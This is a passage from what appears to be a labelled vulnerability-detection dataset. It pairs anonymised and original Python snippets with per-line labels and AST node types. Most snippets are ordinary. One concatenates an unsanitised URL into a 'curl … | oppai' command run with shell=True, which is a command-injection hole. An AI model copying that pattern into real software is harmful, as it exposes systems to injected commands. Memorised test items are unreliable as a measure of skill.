0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"FunctionDef'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Return'",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Assign'",
"Return'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Return'",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"AugAssign'",
"Expr'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_26():...\n",
"frappe.throw(_('Cannot use sub-query or function in fields'), frappe.DataError)\n"
] | [
"def _raise_exception():...\n",
"frappe.throw(_('Cannot use sub-query or function in fields'), frappe.DataError)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_5(self):...\n",
"VAR_22 = self.add_argument_group('Mechanical Turk')\n",
"VAR_23 = VAR_20.path.join(self.parlai_home, 'logs', 'mturk')\n",
"VAR_22.add_argument('--mturk-log-path', default=default_log_path, help=\n 'path to MTurk logs, defaults to {parlai_dir}/logs/mturk')\n",
"VAR_22.add_argument('-t', '--task', help=\n 'MTurk task, e.g. \"qa_data_collection\" or \"model_evaluator\"')\n",
"VAR_22.add_argument('-nc', '--num-conversations', default=1, type=int, help\n ='number of conversations you want to create for this task')\n",
"VAR_22.add_argument('--unique', dest='unique_worker', default=False, action\n ='store_true', help='enforce that no worker can work on your task twice')\n",
"VAR_22.add_argument('--unique-qual-name', dest='unique_qual_name', default=\n None, type=str, help=\n 'qualification name to use for uniqueness between HITs')\n",
"VAR_22.add_argument('-r', '--reward', default=0.05, type=float, help=\n 'reward for each worker for finishing the conversation, in US dollars')\n",
"VAR_22.add_argument('--sandbox', dest='is_sandbox', action='store_true',\n help='submit the HITs to MTurk sandbox site')\n",
"VAR_22.add_argument('--live', dest='is_sandbox', action='store_false', help\n ='submit the HITs to MTurk live site')\n",
"VAR_22.add_argument('--debug', dest='is_debug', action='store_true', help=\n 'print and log all server interactions and messages')\n",
"VAR_22.add_argument('--verbose', dest='verbose', action='store_true', help=\n 'print all messages sent to and from Turkers')\n",
"VAR_22.add_argument('--hard-block', dest='hard_block', action='store_true',\n default=False, help=\n 'Hard block disconnecting Turkers from all of your HITs')\n",
"VAR_22.add_argument('--log-level', dest='log_level', type=int, default=20,\n help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n",
"VAR_22.add_argument('--block-qualification', dest='block_qualification',\n default='', help=\n 'Qualification to use for soft blocking users. By default turkers are never blocked, though setting this will allow you to filter out turkers that have disconnected too many times on previous HITs where this qualification was set.'\n )\n",
"VAR_22.add_argument('--count-complete', dest='count_complete', default=\n False, action='store_true', help=\n 'continue until the requested number of conversations are completed rather than attempted'\n )\n",
"VAR_22.add_argument('--allowed-conversations', dest='allowed_conversations',\n default=0, type=int, help=\n 'number of concurrent conversations that one mturk worker is able to be involved in, 0 is unlimited'\n )\n",
"VAR_22.add_argument('--max-connections', dest='max_connections', default=30,\n type=int, help=\n 'number of HITs that can be launched at the same time, 0 is unlimited.')\n",
"VAR_22.add_argument('--min-messages', dest='min_messages', default=0, type=\n int, help=\n 'number of messages required to be sent by MTurk agent when considering whether to approve a HIT in the event of a partner disconnect. I.e. if the number of messages exceeds this number, the turker can submit the HIT.'\n )\n",
"VAR_22.add_argument('--local', dest='local', default=False, action=\n 'store_true', help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n",
"VAR_22.set_defaults(is_sandbox=True)\n",
"VAR_22.set_defaults(is_debug=False)\n",
"VAR_22.set_defaults(verbose=False)\n"
] | [
"def add_mturk_args(self):...\n",
"mturk = self.add_argument_group('Mechanical Turk')\n",
"default_log_path = os.path.join(self.parlai_home, 'logs', 'mturk')\n",
"mturk.add_argument('--mturk-log-path', default=default_log_path, help=\n 'path to MTurk logs, defaults to {parlai_dir}/logs/mturk')\n",
"mturk.add_argument('-t', '--task', help=\n 'MTurk task, e.g. \"qa_data_collection\" or \"model_evaluator\"')\n",
"mturk.add_argument('-nc', '--num-conversations', default=1, type=int, help=\n 'number of conversations you want to create for this task')\n",
"mturk.add_argument('--unique', dest='unique_worker', default=False, action=\n 'store_true', help='enforce that no worker can work on your task twice')\n",
"mturk.add_argument('--unique-qual-name', dest='unique_qual_name', default=\n None, type=str, help=\n 'qualification name to use for uniqueness between HITs')\n",
"mturk.add_argument('-r', '--reward', default=0.05, type=float, help=\n 'reward for each worker for finishing the conversation, in US dollars')\n",
"mturk.add_argument('--sandbox', dest='is_sandbox', action='store_true',\n help='submit the HITs to MTurk sandbox site')\n",
"mturk.add_argument('--live', dest='is_sandbox', action='store_false', help=\n 'submit the HITs to MTurk live site')\n",
"mturk.add_argument('--debug', dest='is_debug', action='store_true', help=\n 'print and log all server interactions and messages')\n",
"mturk.add_argument('--verbose', dest='verbose', action='store_true', help=\n 'print all messages sent to and from Turkers')\n",
"mturk.add_argument('--hard-block', dest='hard_block', action='store_true',\n default=False, help=\n 'Hard block disconnecting Turkers from all of your HITs')\n",
"mturk.add_argument('--log-level', dest='log_level', type=int, default=20,\n help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n",
"mturk.add_argument('--block-qualification', dest='block_qualification',\n default='', help=\n 'Qualification to use for soft blocking users. By default turkers are never blocked, though setting this will allow you to filter out turkers that have disconnected too many times on previous HITs where this qualification was set.'\n )\n",
"mturk.add_argument('--count-complete', dest='count_complete', default=False,\n action='store_true', help=\n 'continue until the requested number of conversations are completed rather than attempted'\n )\n",
"mturk.add_argument('--allowed-conversations', dest='allowed_conversations',\n default=0, type=int, help=\n 'number of concurrent conversations that one mturk worker is able to be involved in, 0 is unlimited'\n )\n",
"mturk.add_argument('--max-connections', dest='max_connections', default=30,\n type=int, help=\n 'number of HITs that can be launched at the same time, 0 is unlimited.')\n",
"mturk.add_argument('--min-messages', dest='min_messages', default=0, type=\n int, help=\n 'number of messages required to be sent by MTurk agent when considering whether to approve a HIT in the event of a partner disconnect. I.e. if the number of messages exceeds this number, the turker can submit the HIT.'\n )\n",
"mturk.add_argument('--local', dest='local', default=False, action=\n 'store_true', help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n",
"mturk.set_defaults(is_sandbox=True)\n",
"mturk.set_defaults(is_debug=False)\n",
"mturk.set_defaults(verbose=False)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_28(self):...\n",
"VAR_13 = 1234.567\n",
"self.cursor.execute('create table t1(n float)')\n",
"self.cursor.execute('insert into t1 values (?)', VAR_13)\n",
"VAR_20 = self.cursor.execute('select n from t1').fetchone()[0]\n",
"self.assertEqual(VAR_20, VAR_13)\n"
] | [
"def test_float(self):...\n",
"value = 1234.567\n",
"self.cursor.execute('create table t1(n float)')\n",
"self.cursor.execute('insert into t1 values (?)', value)\n",
"result = self.cursor.execute('select n from t1').fetchone()[0]\n",
"self.assertEqual(result, value)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"def FUNC_3(VAR_5):...\n",
"VAR_7 = load_website_config(VAR_5)\n",
"VAR_10 = FUNC_4(VAR_5, VAR_7)\n",
"VAR_12 = IOLoop.instance()\n",
"VAR_12.add_callback(lambda : VAR_0.info('started website {}'.format(VAR_5)))\n",
"start_http_server(VAR_10, VAR_12=io_loop, host=config.host, port=config.port)\n"
] | [
"def start_website(purpose):...\n",
"config = load_website_config(purpose)\n",
"http_handler = create_website_http_handler(purpose, config)\n",
"io_loop = IOLoop.instance()\n",
"io_loop.add_callback(lambda : LOGGER.info('started website {}'.format(purpose))\n )\n",
"start_http_server(http_handler, io_loop=io_loop, host=config.host, port=\n config.port)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_13(self, VAR_10=None, VAR_14=None, VAR_15=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_15:\n",
"VAR_10 = sys.argv[1:] if VAR_10 is None else VAR_10\n",
"return super().parse_known_args(VAR_10, VAR_14)\n",
"VAR_10 = [a for a in VAR_10 if a != '-h' and a != '--help']\n"
] | [
"def parse_known_args(self, args=None, namespace=None, nohelp=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if nohelp:\n",
"args = sys.argv[1:] if args is None else args\n",
"return super().parse_known_args(args, namespace)\n",
"args = [a for a in args if a != '-h' and a != '--help']\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Return'",
"Assign'"
] |
[
"def FUNC_20(*VAR_17, **VAR_18):...\n",
"VAR_61 = VAR_52(*VAR_17, **kwargs)\n",
"if VAR_27:\n",
"mock.patch.object(VAR_61, '_validate_result').start()\n",
"return VAR_61\n"
] | [
"def _new_client_for(*args, **kwargs):...\n",
"sub_client = new_client_for(*args, **kwargs)\n",
"if mock_validate:\n",
"mock.patch.object(sub_client, '_validate_result').start()\n",
"return sub_client\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Expr'",
"Return'"
] |
[
"def FUNC_7(VAR_10, VAR_11):...\n",
"VAR_10 = VAR_10.replace('/b/', '/osu/').split('&', 1)[0]\n",
"if VAR_11 == '':\n",
"VAR_37 = 'curl ' + VAR_10 + ' | /home/pi/DiscordBots/Oppai/oppai/oppai -'\n",
"VAR_37 = ('curl ' + VAR_10 + ' | /home/pi/DiscordBots/Oppai/oppai/oppai - ' +\n VAR_11)\n",
"VAR_20 = subprocess.Popen(VAR_37, stdout=subprocess.PIPE, stderr=subprocess\n .STDOUT, shell=True)\n",
"VAR_21 = VAR_20.stdout.read()\n",
"VAR_22, VAR_23, VAR_24, VAR_25, VAR_26 = FUNC_8(VAR_21)\n",
"if VAR_22 == -1:\n",
"VAR_22 = VAR_38 = VAR_23 = VAR_24 = VAR_25 = VAR_26 = -1\n",
"VAR_20 = subprocess.Popen(VAR_37 + ' 95%', stdout=subprocess.PIPE, stderr=\n subprocess.STDOUT, shell=True)\n",
"return VAR_22, VAR_38, VAR_23, VAR_24, VAR_25, VAR_26\n",
"VAR_21 = VAR_20.stdout.read()\n",
"VAR_38, VAR_39, VAR_39, VAR_39, VAR_39 = FUNC_8(VAR_21)\n",
"return VAR_22, VAR_38, VAR_23, VAR_24, VAR_25, VAR_26\n"
] | [
"def return_beatmap_infos(url, oppaiParameters):...\n",
"url = url.replace('/b/', '/osu/').split('&', 1)[0]\n",
"if oppaiParameters == '':\n",
"command = 'curl ' + url + ' | /home/pi/DiscordBots/Oppai/oppai/oppai -'\n",
"command = ('curl ' + url + ' | /home/pi/DiscordBots/Oppai/oppai/oppai - ' +\n oppaiParameters)\n",
"p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.\n STDOUT, shell=True)\n",
"raw_data = p.stdout.read()\n",
"pp_100, name, combo, stars, diff_params = get_infos(raw_data)\n",
"if pp_100 == -1:\n",
"pp_100 = pp_95 = name = combo = stars = diff_params = -1\n",
"p = subprocess.Popen(command + ' 95%', stdout=subprocess.PIPE, stderr=\n subprocess.STDOUT, shell=True)\n",
"return pp_100, pp_95, name, combo, stars, diff_params\n",
"raw_data = p.stdout.read()\n",
"pp_95, _, _, _, _ = get_infos(raw_data)\n",
"return pp_100, pp_95, name, combo, stars, diff_params\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_5():...\n",
"\"\"\"docstring\"\"\"\n",
"FUNC_1('delete from Player')\n"
] | [
"def deletePlayers():...\n",
"\"\"\"docstring\"\"\"\n",
"execute('delete from Player')\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'"
] |
[
"def FUNC_0(self, *VAR_4, **VAR_5):...\n",
"VAR_11 = self.REQUEST\n",
"VAR_12 = VAR_11.RESPONSE\n",
"return self.getBodyContent(VAR_11)\n"
] | [
"def zmi_body_content(self, *args, **kwargs):...\n",
"request = self.REQUEST\n",
"response = request.RESPONSE\n",
"return self.getBodyContent(request)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_4(self):...\n",
"self.uut.executable = 'more'\n",
"self.uut.use_stdin = True\n",
"self.uut.use_stderr = False\n",
"self.uut.process_output = lambda output, filename, file: output\n",
"VAR_1 = self.uut.lint(file=lines)\n",
"self.assertTrue(('abcd\\n', 'efgh\\n') == VAR_1 or ('abcd\\n', 'efgh\\n', '\\n') ==\n VAR_1)\n"
] | [
"def test_stdin_input(self):...\n",
"self.uut.executable = 'more'\n",
"self.uut.use_stdin = True\n",
"self.uut.use_stderr = False\n",
"self.uut.process_output = lambda output, filename, file: output\n",
"out = self.uut.lint(file=lines)\n",
"self.assertTrue(('abcd\\n', 'efgh\\n') == out or ('abcd\\n', 'efgh\\n', '\\n') ==\n out)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"from __future__ import print_function\n",
"import os\n",
"import threading\n",
"from .__init__ import *\n",
"\"\"\"single level in the virtual fs\"\"\"\n",
"def __init__(self, VAR_0, VAR_1, VAR_2=[], VAR_3=[]):...\n",
"self.realpath = VAR_0\n",
"self.vpath = VAR_1\n",
"self.uread = VAR_2\n",
"self.uwrite = VAR_3\n",
"self.nodes = {}\n",
"def FUNC_0(self, VAR_4, VAR_5):...\n",
"\"\"\"docstring\"\"\"\n",
"assert not VAR_4.endswith('/')\n",
"assert not VAR_5.endswith('/')\n",
"if '/' in VAR_5:\n",
"VAR_34, VAR_5 = VAR_5.split('/', 1)\n",
"if VAR_5 in self.nodes:\n",
"if VAR_34 in self.nodes:\n",
"return self.nodes[VAR_5]\n",
"VAR_20 = '{}/{}'.format(self.vpath, VAR_5).lstrip('/')\n",
"return self.nodes[VAR_34].add(VAR_4, VAR_5)\n",
"VAR_21 = CLASS_0('{}/{}'.format(self.realpath, VAR_34), '{}/{}'.format(self\n .vpath, VAR_34).lstrip('/'), self.uread, self.uwrite)\n",
"VAR_21 = CLASS_0(VAR_4, VAR_20)\n",
"self.nodes[VAR_34] = VAR_21\n",
"self.nodes[VAR_5] = VAR_21\n",
"return VAR_21.add(VAR_4, VAR_5)\n",
"return VAR_21\n"
] | [
"from __future__ import print_function\n",
"import os\n",
"import threading\n",
"from .__init__ import *\n",
"\"\"\"single level in the virtual fs\"\"\"\n",
"def __init__(self, realpath, vpath, uread=[], uwrite=[]):...\n",
"self.realpath = realpath\n",
"self.vpath = vpath\n",
"self.uread = uread\n",
"self.uwrite = uwrite\n",
"self.nodes = {}\n",
"def add(self, src, dst):...\n",
"\"\"\"docstring\"\"\"\n",
"assert not src.endswith('/')\n",
"assert not dst.endswith('/')\n",
"if '/' in dst:\n",
"name, dst = dst.split('/', 1)\n",
"if dst in self.nodes:\n",
"if name in self.nodes:\n",
"return self.nodes[dst]\n",
"vp = '{}/{}'.format(self.vpath, dst).lstrip('/')\n",
"return self.nodes[name].add(src, dst)\n",
"vn = VFS('{}/{}'.format(self.realpath, name), '{}/{}'.format(self.vpath,\n name).lstrip('/'), self.uread, self.uwrite)\n",
"vn = VFS(src, vp)\n",
"self.nodes[name] = vn\n",
"self.nodes[dst] = vn\n",
"return vn.add(src, dst)\n",
"return vn\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Docstring",
"Assert'",
"Assert'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Return'",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'",
"Return'"
] |
[
"def FUNC_25(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return any(self.live_processes())\n"
] | [
"def any_processes_alive(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return any(self.live_processes())\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self, VAR_18, VAR_6, VAR_4, VAR_19):...\n",
"if 'internet_nl_api_password' in VAR_4.changed_data:\n",
"VAR_26 = Fernet(settings.FIELD_ENCRYPTION_KEY)\n",
"super().save_model(VAR_18, VAR_6, VAR_4, VAR_19)\n",
"VAR_27 = VAR_26.encrypt(VAR_6.internet_nl_api_password.encode())\n",
"VAR_6.internet_nl_api_password = VAR_27\n"
] | [
"def save_model(self, request, obj, form, change):...\n",
"if 'internet_nl_api_password' in form.changed_data:\n",
"f = Fernet(settings.FIELD_ENCRYPTION_KEY)\n",
"super().save_model(request, obj, form, change)\n",
"encrypted = f.encrypt(obj.internet_nl_api_password.encode())\n",
"obj.internet_nl_api_password = encrypted\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Expr'",
"Assign'",
"Assign'"
] |
[
"def FUNC_1(VAR_5, **VAR_6):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_7(VAR_17):...\n",
"@receiver(VAR_5, **decorator_kwargs)...\n",
"if settings.SUSPEND_SIGNALS:\n",
"return\n",
"return VAR_17(VAR_23, **kwargs)\n"
] | [
"def suspending_receiver(signal, **decorator_kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"def our_wrapper(func):...\n",
"@receiver(signal, **decorator_kwargs)...\n",
"if settings.SUSPEND_SIGNALS:\n",
"return\n",
"return func(sender, **kwargs)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"FunctionDef'",
"Condition",
"Condition",
"Return'",
"Return'"
] |
[
"from __future__ import absolute_import, division, print_function, unicode_literals\n",
"import os\n",
"import sys\n",
"from builtins import filter, object\n",
"from collections import defaultdict\n",
"from contextlib import contextmanager\n",
"from twitter.common.collections import OrderedSet\n",
"from pants.base.build_environment import get_buildroot, get_scm\n",
"from pants.base.worker_pool import SubprocPool\n",
"from pants.base.workunit import WorkUnit, WorkUnitLabel\n",
"from pants.build_graph.target import Target\n",
"from pants.engine.isolated_process import FallibleExecuteProcessResult\n",
"from pants.goal.products import Products\n",
"from pants.goal.workspace import ScmWorkspace\n",
"from pants.process.lock import OwnerPrintingInterProcessFileLock\n",
"from pants.reporting.report import Report\n",
"from pants.source.source_root import SourceRootConfig\n",
"\"\"\"string\"\"\"\n",
"\"\"\"A logger facade that logs into the pants reporting framework.\"\"\"\n",
"def __init__(self, VAR_1):...\n",
"self._run_tracker = VAR_1\n",
"def FUNC_27(self, *VAR_33):...\n",
"self._run_tracker.log(Report.DEBUG, *VAR_33)\n",
"def FUNC_28(self, *VAR_33):...\n",
"self._run_tracker.log(Report.INFO, *VAR_33)\n",
"def FUNC_29(self, *VAR_33):...\n",
"self._run_tracker.log(Report.WARN, *VAR_33)\n",
"def FUNC_30(self, *VAR_33):...\n",
"self._run_tracker.log(Report.ERROR, *VAR_33)\n",
"def FUNC_31(self, *VAR_33):...\n",
"self._run_tracker.log(Report.FATAL, *VAR_33)\n",
"def __init__(self, VAR_0, VAR_1, VAR_2, VAR_3=None, VAR_4=None, VAR_5=None,...\n",
"self._options = VAR_0\n",
"self.build_graph = VAR_5\n",
"self.build_file_parser = VAR_6\n",
"self.address_mapper = VAR_7\n",
"self.run_tracker = VAR_1\n",
"self._log = self.Log(VAR_1)\n",
"self._target_base = VAR_4 or Target\n",
"self._products = Products()\n",
"self._buildroot = get_buildroot()\n",
"self._source_roots = SourceRootConfig.global_instance().get_source_roots()\n",
"self._lock = OwnerPrintingInterProcessFileLock(os.path.join(self._buildroot,\n '.pants.workdir.file_lock'))\n",
"self._java_sysprops = None\n",
"self.requested_goals = VAR_3 or []\n",
"self._console_outstream = VAR_8 or sys.stdout\n",
"self._scm = VAR_9 or get_scm()\n",
"self._workspace = VAR_10 or (ScmWorkspace(self._scm) if self._scm else None)\n",
"self._replace_targets(VAR_2)\n",
"self._invalidation_report = VAR_11\n",
"self._scheduler = VAR_12\n",
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._options\n"
] | [
"from __future__ import absolute_import, division, print_function, unicode_literals\n",
"import os\n",
"import sys\n",
"from builtins import filter, object\n",
"from collections import defaultdict\n",
"from contextlib import contextmanager\n",
"from twitter.common.collections import OrderedSet\n",
"from pants.base.build_environment import get_buildroot, get_scm\n",
"from pants.base.worker_pool import SubprocPool\n",
"from pants.base.workunit import WorkUnit, WorkUnitLabel\n",
"from pants.build_graph.target import Target\n",
"from pants.engine.isolated_process import FallibleExecuteProcessResult\n",
"from pants.goal.products import Products\n",
"from pants.goal.workspace import ScmWorkspace\n",
"from pants.process.lock import OwnerPrintingInterProcessFileLock\n",
"from pants.reporting.report import Report\n",
"from pants.source.source_root import SourceRootConfig\n",
"\"\"\"Contains the context for a single run of pants.\n\n Task implementations can access configuration data from pants.ini and any flags they have exposed\n here as well as information about the targets involved in the run.\n\n Advanced uses of the context include adding new targets to it for upstream or downstream goals to\n operate on and mapping of products a goal creates to the targets the products are associated with.\n\n :API: public\n \"\"\"\n",
"\"\"\"A logger facade that logs into the pants reporting framework.\"\"\"\n",
"def __init__(self, run_tracker):...\n",
"self._run_tracker = run_tracker\n",
"def debug(self, *msg_elements):...\n",
"self._run_tracker.log(Report.DEBUG, *msg_elements)\n",
"def info(self, *msg_elements):...\n",
"self._run_tracker.log(Report.INFO, *msg_elements)\n",
"def warn(self, *msg_elements):...\n",
"self._run_tracker.log(Report.WARN, *msg_elements)\n",
"def error(self, *msg_elements):...\n",
"self._run_tracker.log(Report.ERROR, *msg_elements)\n",
"def fatal(self, *msg_elements):...\n",
"self._run_tracker.log(Report.FATAL, *msg_elements)\n",
"def __init__(self, options, run_tracker, target_roots, requested_goals=None,...\n",
"self._options = options\n",
"self.build_graph = build_graph\n",
"self.build_file_parser = build_file_parser\n",
"self.address_mapper = address_mapper\n",
"self.run_tracker = run_tracker\n",
"self._log = self.Log(run_tracker)\n",
"self._target_base = target_base or Target\n",
"self._products = Products()\n",
"self._buildroot = get_buildroot()\n",
"self._source_roots = SourceRootConfig.global_instance().get_source_roots()\n",
"self._lock = OwnerPrintingInterProcessFileLock(os.path.join(self._buildroot,\n '.pants.workdir.file_lock'))\n",
"self._java_sysprops = None\n",
"self.requested_goals = requested_goals or []\n",
"self._console_outstream = console_outstream or sys.stdout\n",
"self._scm = scm or get_scm()\n",
"self._workspace = workspace or (ScmWorkspace(self._scm) if self._scm else None)\n",
"self._replace_targets(target_roots)\n",
"self._invalidation_report = invalidation_report\n",
"self._scheduler = scheduler\n",
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._options\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Docstring",
"Return'"
] |
[
"@classmethod...\n",
"return [FUNC_29, FUNC_30]\n"
] | [
"@classmethod...\n",
"return [failing, skipped]\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_5(self, VAR_19: UserDTO):...\n",
"\"\"\"docstring\"\"\"\n",
"self.email_address = VAR_19.email_address.lower(\n ) if VAR_19.email_address else None\n",
"self.twitter_id = VAR_19.twitter_id.lower() if VAR_19.twitter_id else None\n",
"self.facebook_id = VAR_19.facebook_id.lower() if VAR_19.facebook_id else None\n",
"self.linkedin_id = VAR_19.linkedin_id.lower() if VAR_19.linkedin_id else None\n",
"self.validation_message = VAR_19.validation_message\n",
"db.session.commit()\n"
] | [
"def update(self, user_dto: UserDTO):...\n",
"\"\"\"docstring\"\"\"\n",
"self.email_address = user_dto.email_address.lower(\n ) if user_dto.email_address else None\n",
"self.twitter_id = user_dto.twitter_id.lower() if user_dto.twitter_id else None\n",
"self.facebook_id = user_dto.facebook_id.lower(\n ) if user_dto.facebook_id else None\n",
"self.linkedin_id = user_dto.linkedin_id.lower(\n ) if user_dto.linkedin_id else None\n",
"self.validation_message = user_dto.validation_message\n",
"db.session.commit()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_14(self, VAR_7):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
"def _get_proxied_attribute_value(self, attribute):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
0,
0
] | [
"FunctionDef'",
"Docstring"
] |
[
"def FUNC_2(VAR_2):...\n",
"return render(VAR_2, 'etd_app/home.html')\n"
] | [
"def home(request):...\n",
"return render(request, 'etd_app/home.html')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"from google.appengine.api import users as gae_users\n",
"from components import auth\n",
"from components import config as config_api\n",
"from components import decorators\n",
"from components import endpoints_webapp2\n",
"from components import prpc\n",
"import webapp2\n",
"from legacy import api as legacy_api\n",
"from legacy import swarmbucket_api\n",
"import access\n",
"import api\n",
"import bq\n",
"import bulkproc\n",
"import config\n",
"import expiration\n",
"import model\n",
"import notifications\n",
"import service\n",
"import swarming\n",
"import user\n",
"VAR_0 = (\n 'https://chromium.googlesource.com/infra/infra/+/master/appengine/cr-buildbucket/README.md'\n )\n",
"\"\"\"Redirects to README.md.\"\"\"\n",
"def FUNC_2(self):...\n",
"return self.redirect(VAR_0)\n"
] | [
"from google.appengine.api import users as gae_users\n",
"from components import auth\n",
"from components import config as config_api\n",
"from components import decorators\n",
"from components import endpoints_webapp2\n",
"from components import prpc\n",
"import webapp2\n",
"from legacy import api as legacy_api\n",
"from legacy import swarmbucket_api\n",
"import access\n",
"import api\n",
"import bq\n",
"import bulkproc\n",
"import config\n",
"import expiration\n",
"import model\n",
"import notifications\n",
"import service\n",
"import swarming\n",
"import user\n",
"README_MD = (\n 'https://chromium.googlesource.com/infra/infra/+/master/appengine/cr-buildbucket/README.md'\n )\n",
"\"\"\"Redirects to README.md.\"\"\"\n",
"def get(self):...\n",
"return self.redirect(README_MD)\n"
] | [
3,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Assign'",
"Expr'",
"FunctionDef'",
"Return'"
] |
[
"def FUNC_27(self, VAR_75):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.threads = VAR_75\n",
"return VAR_101\n"
] | [
"def threads(self, threads):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.threads = threads\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"from m5.params import *\n",
"from m5.proxy import *\n",
"from m5.util.fdthelper import *\n",
"from m5.SimObject import SimObject\n",
